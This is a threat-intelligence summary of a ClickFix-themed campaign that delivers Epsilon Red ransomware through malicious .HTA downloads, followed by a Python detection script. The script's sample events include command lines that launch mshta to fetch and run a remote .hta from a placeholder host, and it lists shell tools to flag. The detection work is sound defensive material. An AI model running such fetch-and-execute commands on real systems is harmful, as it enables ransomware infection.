Intel Name: Threat actors lure victims into downloading .HTA files using ClickFix to spread Epsilon Red ransomware
Date of Scan: August 1, 2025
Impact: Medium
Summary: An active malware campaign using ClickFix-themed lures is spreading the Epsilon Red ransomware. Unlike earlier versions, this variant redirects victims to a second page where malicious shell commands are silently executed via ActiveX, downloading a malicious .HTA file. Social engineering tactics like fake verification codes make the attack appear legitimate. The infrastructure mimics popular services such as Discord, Twitch, OnlyFans, and Kick, and also uses romance-themed traps. Epsilon Red, first observed in 2021, resembles REvil in ransom note design but differs in tactics and infrastructure.
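The chain described above (browser page hands off to a shell via ActiveX, which then fetches and runs a remote .HTA) leaves a recognisable trace in process-creation telemetry. The following is an added detection example, not code from the report: it triages constructed Sysmon-style events (placeholder hostnames, not campaign indicators) for a shell spawned by a browser and for mshta.exe launched with a remote .hta URL.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style fields).
# These are illustrative only; the hostname is a placeholder, not an indicator.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c mshta https://verify.example.invalid/check.hta"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta https://verify.example.invalid/check.hta"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta C:\Tools\local_dashboard.hta"},   # local HTA, benign here
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe readme.txt"},
]

BROWSERS = {"iexplore.exe", "msedge.exe", "chrome.exe", "firefox.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# A .hta referenced by http(s) URL rather than a local path.
REMOTE_HTA = re.compile(r"https?://\S+\.hta\b", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Return the list of detection reasons that apply to one event (empty if none)."""
    reasons = []
    parent, child = basename(event["ParentImage"]), basename(event["Image"])
    cmd = event["CommandLine"]
    # ActiveX/ClickFix hand-off: a browser directly spawning a script or command host.
    if parent in BROWSERS and child in SHELLS:
        reasons.append("browser-spawned-shell")
    # mshta.exe pulling its HTA from the network rather than a local file.
    if child == "mshta.exe" and REMOTE_HTA.search(cmd):
        reasons.append("mshta-remote-hta")
    # Any other process carrying a remote .hta URL on its command line.
    if child != "mshta.exe" and REMOTE_HTA.search(cmd):
        reasons.append("remote-hta-in-cmdline")
    return reasons


def scan(events: list) -> list:
    """(index, reasons) for every event that triggers at least one reason."""
    return [(i, r) for i, e in enumerate(events) if (r := classify(e))]


if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["CommandLine"], reasons)
```

Tune BROWSERS and SHELLS to the environment; the local-HTA event is deliberately left unflagged so legitimate HTA tooling does not drown the signal.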